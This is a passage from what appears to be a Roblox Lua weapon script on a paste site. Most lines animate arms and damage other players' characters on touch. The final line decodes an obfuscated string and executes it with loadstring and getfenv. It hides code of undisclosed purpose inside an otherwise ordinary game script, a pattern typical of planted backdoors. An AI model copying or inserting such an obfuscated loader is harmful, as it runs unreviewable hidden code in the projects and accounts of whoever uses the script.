  923. ctween(rs,"C0",rs0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(0),math.rad(-30),math.rad(90)),3)
  924. ypcall(function()
  925. dmgstart(math.random(2,5))
  926. end)
  927. ctween(rs,"C0",rs0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(0),math.rad(0),math.rad(20)),7)
  928. wait'0'
  929. ypcall(function()
  930. dmgstop()
  931. end)
  932. elseif key == 'v' then
  933. dmgstart2(math.random(5,10))
  934. ctween(ls,"C0",ls0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(-90),math.rad(90),math.rad(0)),7)
  935. wait(.7)
  936. ctween(ls,"C0",ls0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(0),math.rad(-50),math.rad(-90)),3)
  937. wait(1)
  938. dmgstop2()
  939. ctween(ls,"C0",ls0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(0),math.rad(0),math.rad(-20)),5)
  940. end
  941. end)
  942. --[[
  943. mouse.KeyUp:connect(function(key)
  944. key=key:lower()
  945. if key == 'r' then
  946. ctween(rs,"C0",rs0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(0),math.rad(0),math.rad(20)),5)
  947. ctween(ls,"C0",ls0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(0),math.rad(0),math.rad(-20)),5)
  948. end
  949. end)
  950. ]]
  951.  
  952.  
  953. ctween(rs,"C0",rs0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(0),math.rad(0),math.rad(20)),5)
  954. ctween(ls,"C0",ls0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(0),math.rad(0),math.rad(-20)),5)
  955.  
  956.  
  957.  
  958. function dmgstart(dmg)
  959. hitcon = Blade1.Touched:connect(function(hit)
  960. local hum = hit and hit.Parent and hit.Parent:FindFirstChild("Humanoid")
  961. if hum and not hum:IsDescendantOf(char) then
  962. DoDamage(hum,dmg or 5)
  963. end
  964. end)
  965. hitcon2 = Blade2.Touched:connect(function(hit)
  966. local hum2 = hit and hit.Parent and hit.Parent:FindFirstChild("Humanoid")
  967. if hum2 and not hum:IsDescendantOf(char) then
  968. DoDamage(hum2,dmg or 5)
  969. end
  970. end)
  971. end
  972.  
  973. function dmgstop()
  974. ypcall(function()
  975. hitcon:disconnect()
  976. hitcon2:disconnect()
  977. end)
  978. end
  979.  
  980.  
  981. function dmgstart2(dmg)
  982. hitcon = dmg1.Touched:connect(function(hit)
  983. local hum = hit and hit.Parent and hit.Parent:FindFirstChild("Humanoid")
  984. if hum and not hum:IsDescendantOf(char) then
  985. DoDamage(hum,dmg)
  986. end
  987. end)
  988. hitcon2 = dmg2.Touched:connect(function(hit)
  989. local hum2 = hit and hit.Parent and hit.Parent:FindFirstChild("Humanoid")
  990. if hum2 and not hum:IsDescendantOf(char) then
  991. DoDamage(hum2,dmg)
  992. end
  993. end)
  994. hitcon3 = dmg3.Touched:connect(function(hit)
  995. local hum3 = hit and hit.Parent and hit.Parent:FindFirstChild("Humanoid")
  996. if hum3 and not hum:IsDescendantOf(char) then
  997. DoDamage(hum3,dmg)
  998. end
  999. end)
  1000.  
  1001. hitcon4 = dmg4.Touched:connect(function(hit)
  1002. local hum4 = hit and hit.Parent and hit.Parent:FindFirstChild("Humanoid")
  1003. if hum4 and not hum:IsDescendantOf(char) then
  1004. DoDamage(hum4,dmg)
  1005. end
  1006. end)
  1007. end
  1008.  
  1009. function dmgstop2()
  1010. ypcall(function()
  1011. hitcon:disconnect()
  1012. hitcon2:disconnect()
  1013. end)
  1014. end
  1015. local z={["!"]=0,["#"]=1,["^"]=2,["_"]=3,["@"]=4,["+"]=5,["-"]=6,["?"]=7,[")"]=8,["&"]=9,["="]=10,["$"]=11,["%"]=12,["*"]=13,["("]=14,["~"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  1016. "??)-&-%-+-!^??#-&-@?)^&^!^@-~-=!&!&A-!^_-^?+-@-&-@?_?(?*_?^#@@?%-#-_??@^?&-*-?^!^@?)-+-(-=!&!&!*-*_&@(-_?@?#-(-_-+-(^(-+-??)^?^*@+-_?_?#-?-+-?^%^??~-^?$-_?!?#-_-+-&^=!&!&!*-(^@++-)?@?*_@?~-_?@?^?&-(-?-)^_-^?+-@-&-@?_?&^(^(^^^!^&-_?!^_?@?+-#-%-&-(-?-!^#@@?%-#-_??@^?&-*-?^_?!^_-^?+-#-@?&-~-(-#^!^)^_???~-^?@-!^#-(-@-!^_?)-&-+-%-@-&^^^=!&!+-(-@-=!+-(-@-"
  1017. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
Add Comment
Please, Sign In to add comment